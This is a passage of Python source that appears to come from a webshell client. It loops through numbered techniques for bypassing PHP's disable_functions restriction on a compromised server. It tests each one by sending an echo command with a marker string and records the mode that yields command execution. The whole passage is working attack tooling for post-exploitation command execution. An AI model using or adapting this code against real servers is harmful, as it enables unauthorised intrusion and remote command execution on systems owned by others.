or gget("db_dbms", "webshell") != "mysql"):
test_list -= {8}
for test_mode in test_list:
print(f"Try Mode {test_mode} {mode_to_desc_dict[test_mode]}:")
if (set_mode(test_mode, True)):
res = send(
get_system_code("echo 6ac2ed344113c07c0028327388553273",
mode=test_mode))
if (res and "6ac2ed344113c07c0028327388553273" in res.r_text):
print(color.green("\n Success\n"))
print(
f"Set bypass disable_functions: {test_mode}-{mode_to_desc_dict[test_mode]}\n"
)
gset("webshell.bypass_df", test_mode, True, "webshell")
break
else:
print(color.red("\n Failed!\n"))
continue
else:
try:
mode = int(mode)
except ValueError:
print(color.red("\nMode error\n"))
return
if (mode == 0):
print(
f"\nbypass disable_functions: {mode_to_desc_dict[gget('webshell.bypass_df', 'webshell')]}\n"
)
elif (mode in mode_to_desc_dict
and (mode not in mode_linux_set or not is_windows())):
set_mode(mode)
pass
else:
print(color.red("\nMode error\n"))
